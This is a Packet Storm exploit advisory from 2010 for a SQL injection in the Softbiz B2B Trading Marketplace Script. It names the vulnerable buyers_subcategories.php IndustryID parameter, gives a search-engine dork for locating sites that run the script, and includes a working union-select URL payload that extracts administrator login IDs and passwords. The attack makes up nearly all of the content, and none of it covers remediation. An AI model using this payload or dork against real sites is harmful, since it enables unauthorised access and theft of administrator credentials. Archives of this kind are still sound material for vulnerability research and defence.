Softbiz B2B Trading Marketplace SQL Injection

2010-04-16T00:00:00
ID PACKETSTORM:88473
Type packetstorm
Reporter AnGrY BoY
Modified 2010-04-16T00:00:00

Description

                                        
                                            `# Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability  
# Date :15/4/2010  
# Author : AnGrY BoY  
# Contact: h4kurd@hotmail.com & h4kurd@yahoo.com  
# Home : http://www.kurd-security.com  
# Software Link : N/A  
# Version : Softbiz B2B trading Marketplace Script  
# Tested on : windows SP2  
# CVE : 0  
# Dork : buyers_subcategories.php?IndustryID=  
  
  
  
# expolit:  
  
  
# http://localhost/path/buyers_subcategories.php?IndustryID=[SQL]  
  
# http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--  
  
=============================================  
# Gre3tZ :- all kurd-security members  
`